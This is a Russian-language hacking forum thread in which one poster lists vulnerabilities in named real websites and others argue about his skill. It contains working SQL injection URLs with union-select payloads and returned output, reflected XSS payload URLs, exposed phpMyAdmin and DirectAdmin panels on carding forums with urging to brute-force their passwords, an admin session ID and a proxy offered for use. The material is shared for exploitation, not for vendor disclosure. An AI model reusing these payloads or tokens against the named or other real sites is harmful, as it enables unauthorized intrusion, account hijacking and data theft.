можно путь до сервака узнать

http://unactpay.ru/index.php?page=1'&cur=1&id=10

А так же скуля
http://unactpay.ru/index.php?page=news&cur=1&id=1'

<...>
f-8" />
</head>
<body>

</body></html>

<h1>Новости</h1><br/><br />
<b>Warning</b>: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in <b>/var/www/unactpay.ru/htdocs/classes/qtrdb.php</b> on line <b>99</b><br />
<br />
<b>Warning</b>: mysql_result(): supplied argument is not a valid MySQL result resource in <b>/var/www/unactpay.ru/htdocs/classes/qtrdb.ph
<...>


-----

ыы ) я про осмп пока помолчу=/

Так же моя работа=/

http://www.dom3.ru/blog/view/-5867')+union+select+version()--%20
5.0.45
http://www.dom3.ru/blog/view/-5867')+union+select+user()--%20
dom3@localhost
читать файлы через лоад файл низзя
http://www.dom3.ru/blog/view/-5867')+union+select+table_name+from+information_sc hema.tables+limit+0,1--%20
таблицы (limitом двигать)


+
XSS

http://dom2.ru/pulse/photogallery/?keyword=%22%3E%3Cscript%3Ealert%28%27+hacking.fm+ Hacked%27%29%3C%2Fscript%3E%3C%22

-------

Так же кто то насчёт датинга спрашивал пока не копал=/
но на datingfaces.com можно сделать удаленное выполнение команд на сервере

Так же на luckylovers.net XSS

http://luckylovers.net/f/main.php?forgot=1&language=%22%3E%3Cscript%3Ealert%28%27Hacking.fm+H acked%27%29%3C%2Fscript%3E%3C%22

И ещё много много чего интересного=/
/me ушёл ковырять всё

---------------


ВОТ вторая SQl
http://unactpay.ru/?page=news&cur=1&id=1'





---------------
А так же )
http://osmp.ru/search.php?query_string='/// хз пока не копал не смотрел, это мельком.
+ в дар отдаю первому любящему меня челвоеку laugh.gif

http://comedyclub.ru/download/video/she.php

+ отдам это
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

--------------

В кучу

Есть доступ к cpanel
http://egy2net.com
+
[b]Ещё не доломал=/..

--------

И так начну с самого шакируещего )))
Все знают http://rapida.ru/ ?
Нате я открыл вот что вам http://rapida.ru/phpmyadmin/ заходим без пороля ))))))))))) но базы я ограничил )))) Гостевой вход ))))))

cvv2.org:1080 пользуемся соксом дамые и господа biggrin.gif

http://www.cvv2.org:2222/ брутим пасс в директ админ laugh.gif

так же скажу хоститься этот форум у MIRhosting.com laugh.gif
Классный кардинг форум? По моему мнению лучший laugh.gif

-----------
http://cvv2.org/phpmyadmin/ вообще убило нах... я в шоке laugh.gif
так же кто найдёт уязвимость там ) а я нашёл))) вот пакпка в которую можно что лимбо записать http://www.cvv2.org/clientscript/
Так же вот ссесия админа 4f8af31d4e9d7313abab1d42ae58b4e0 )))))))))))

--------------------
Такая же шняга на xakepy.cc
http://www.xakepy.cc/clientscript/
ЛОМАТЬ НЕ БУДУ ) Свои всё таки=/
----------------------------

Идём дальше ))) я вообще просто не то что угараю я в шоке в офигенном ))

http://isell.cc/ класный закрытый кардинг форум да?
http://isell.cc/phpmyadmin/ мама божи упаси
http://isell.cc:2222/ брутим пороли))))))))))))))

----------------------------

Кто хочет сломать самый классный сайт загрузок?
Го http://loads.cc/phpmyadmin/
Хаха
http://www.loads.cc:2222/
Просто я смотрю и думаю... )))) вот так мда=/


ВОТ ЭТО ВСЁ ОБРАЗНО ГЛЯНУЛ. А ЧТО БУДЕТ ЕСЛИ УГЛУбиТСЯ ??)))))

где брал?

добей пожайлуйста http://isell.cc/ =))))

Всё своё..Кто то помогал )) а так всё сам ))

+1

так это ты hacking.fm :D
ми ржал

А что смешного ? Ты можешь лучше? вперёд..

На радио я.

есть пасс и логин от админа от http://isell.cc

За isell тебя надо за яйцы павесить=\

Solide Snake я уже всё слил=/ и всё узнал так что дыра там неизбежна =/
ВСЁ ДЕЛАЛ РАДИ ТОГО ЧТО БЫ ПОКАЗАТЬ ЧТО ВСЁ УЯЗВИМО

Прикольно)))

А что смешного ? Ты можешь лучше? вперёд..
нет, что ты
Ты лучший хэк в мире. Чёрная шляпа не жмёт?

Spyder мне пох вообще.
Я тебе повторяю я тут не пантуюсь как ты думаешь и не пиарю себя=/
Показал что уязвимые места есть и будут и тут ничего такого нету.По твоей логике шляпа всему античату жмёт :D

нет, то что ты понтуешься думают на вхб

Solide Snake я уже всё слил=/ и всё узнал так что дыра там неизбежна =/
ВСЁ ДЕЛАЛ РАДИ ТОГО ЧТО БЫ ПОКАЗАТЬ ЧТО ВСЁ УЯЗВИМО

ухахахахахах
жаль еще не задефейсил)
не обращай внимание у них недохек

Да мне пох что где думают ) Везде так думают )))

да мне тем более по***))

Щяс будите обижать Диджея и мы без радио останемся...

Я ещё по радио скажу какие есть люди плохие=/ ))))))))))

Щяс будите обижать Диджея и мы без радио останемся...
да это катастрофа века

Хм по данным которые узнал, народ предлагает 3к за информацию о DJ_Bes :(

о DJ_Bes или от DJ_Bes

МОЛОДЕЦ

Ты специально создал тему в болталке чтоб минусы не ставили?

Всё и так знают что ничего неломаемого нет. Нехрен тут было это писать=\

Ну знают )) а фактов нету ) т.е мало )) А видео на античате тоже просто так выкладывают ? Я типа тоже самое сделал)

половина боян, остальное непохек

Ну знают )) а фактов нету ) т.е мало )) А видео на античате тоже просто так выкладывают ? Я типа тоже самое сделал)
Ты долбостук какой-то, который захотел похорохориться и потешить самолюбие. От пассивных xss мало толку, они есть почти везде. Скули не разработаны, не факт что они и пройдут гладко итп. Директадмин стандартно на 2222 порту, туда редирект из папки site.ru/config если я не ошибаюсь. PhpMyAdmin тож оч много где есть, авторизация есть, пассов у тя нету, смысл от него? Версии там далеко не старые чтоб инклуд в них был плюс ко всему. Чё там ещё было... clientscript в любой булке есть, похэкай античат, тут он тоже имеет место быть. Так что думай, мегахэккер...

Короче надоели сраться..
тема закрыта